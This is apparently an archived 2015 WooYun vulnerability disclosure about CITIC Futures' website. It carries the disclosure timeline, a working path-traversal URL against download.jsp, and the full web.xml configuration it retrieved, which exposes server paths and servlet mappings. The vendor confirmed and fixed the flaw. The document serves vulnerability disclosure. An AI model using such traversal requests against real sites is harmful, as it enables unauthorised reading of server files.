乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-05: 细节已通知厂商并且等待厂商处理中 2015-06-09: 厂商已经确认,细节仅向厂商公开 2015-06-19: 细节向核心白帽子及相关领域专家公开 2015-06-29: 细节向普通白帽子公开 2015-07-09: 细节向实习白帽子公开 2015-07-24: 细节向公众公开
中信期货!厂商能不能给高rank呢?么么哒
http://www.citicsf.com/download.jsp?fileName=../WEB-INF/web.xml
<?xml version="1.0" encoding="UTF-8"?><web-app version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"> <jsp-config> <jsp-property-group> <url-pattern>*.jspv</url-pattern> </jsp-property-group> </jsp-config> <session-config> <session-timeout> 60 </session-timeout> </session-config> <welcome-file-list> <welcome-file>index.jsp</welcome-file> </welcome-file-list> <filter> <filter-name>SetCharacterEncodingFilter</filter-name> <filter-class>struts.annotation.filter.SetCharacterEncodingFilter</filter-class> </filter> <filter-mapping> <filter-name>SetCharacterEncodingFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <context-param> <param-name>siteName</param-name> <param-value>中证期货网站</param-value> </context-param> <context-param> <param-name>systemName</param-name> <param-value>中证期货网站管理系统</param-value> </context-param> <context-param> <param-name>companyName</param-name> <param-value>中证期货</param-value> </context-param> <context-param> <param-name>systemVersion</param-name> <param-value>1.0</param-value> </context-param> <context-param> <param-name>pageSize</param-name> <param-value>20</param-value> </context-param> <context-param> <param-name>citi_website_url</param-name> <param-value>http://www.citicsf.com/</param-value> </context-param> <context-param> <param-name>citi_website_dir</param-name> <param-value>D:/zhongzheng/Java/web_www/web/</param-value> </context-param> <context-param> <param-name>citi_website_ext</param-name> <param-value>.shtml</param-value> </context-param> <context-param> <param-name>log_switch</param-name> <param-value>1</param-value> </context-param> <!-- Tomcat form验证定义 --> <security-constraint> <web-resource-collection> <web-resource-name>WebContent</web-resource-name> <url-pattern>*.do</url-pattern> <url-pattern>*.s</url-pattern> <url-pattern>*.html</url-pattern> <url-pattern>*.htm</url-pattern> <url-pattern>*.jsp</url-pattern> <url-pattern>*.jspf</url-pattern> <url-pattern>/dwr/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>manager</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>FORM</auth-method> <realm-name>web</realm-name> <form-login-config> <form-login-page>/login.jsp</form-login-page> <form-error-page>/login_error.jsp</form-error-page> </form-login-config> </login-config> <!-- Struts 和 DWR定义 --> <servlet> <servlet-name>action</servlet-name> <servlet-class>org.apache.struts.action.ActionServlet</servlet-class> <load-on-startup>2</load-on-startup> </servlet> <servlet> <servlet-name>OctetStreamReader</servlet-name> <servlet-class>cn.citi.action.OctetStreamReader</servlet-class> </servlet> <servlet> <servlet-name>TreeServlet</servlet-name> <servlet-class>cn.citi.action.TreeServlet</servlet-class> </servlet> <servlet> <servlet-name>ValidatenumberServlet</servlet-name> <servlet-class>cn.citi.action.ValidatenumberServlet</servlet-class> </servlet> <servlet> <servlet-name>CheckFormServlet</servlet-name> <servlet-class>cn.citi.admin.action.CheckFormServlet</servlet-class> </servlet> <servlet> <servlet-name>PwdServlet</servlet-name> <servlet-class>cn.citi.action.PwdServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>PwdServlet</servlet-name> <url-pattern>/pwd.v</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>ValidatenumberServlet</servlet-name> <url-pattern>/validatenumber.v</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>CheckFormServlet</servlet-name> <url-pattern>/checkform.s</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>TreeServlet</servlet-name> <url-pattern>/tree.s</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>OctetStreamReader</servlet-name> <url-pattern>/upload.s</url-pattern> </servlet-mapping> <servlet-mapping> <servlet-name>action</servlet-name> <url-pattern>*.do</url-pattern> </servlet-mapping> <servlet> <servlet-name>dwr-invoker</servlet-name> <servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class> <init-param> <param-name>debug</param-name> <param-value>false</param-value> </init-param> <init-param> <param-name>allowScriptTagRemoting</param-name > <param-value>true</param-value> </init-param> <init-param> <param-name>crossDomainSessionSecurity</param-name> <param-value>false</param-value> </init-param> <load-on-startup>3</load-on-startup> </servlet> <servlet-mapping> <servlet-name>dwr-invoker</servlet-name> <url-pattern>/dwr/*</url-pattern> </servlet-mapping> <error-page> <error-code>403</error-code> <location>/login_error2.jsp</location> </error-page> <error-page> <error-code>404</error-code> <location>/login_error3.jsp</location> </error-page></web-app>
能否给个高rank ?
危害等级:低
漏洞Rank:5
确认时间:2015-06-09 15:02
非常感谢!漏洞已处理。
暂无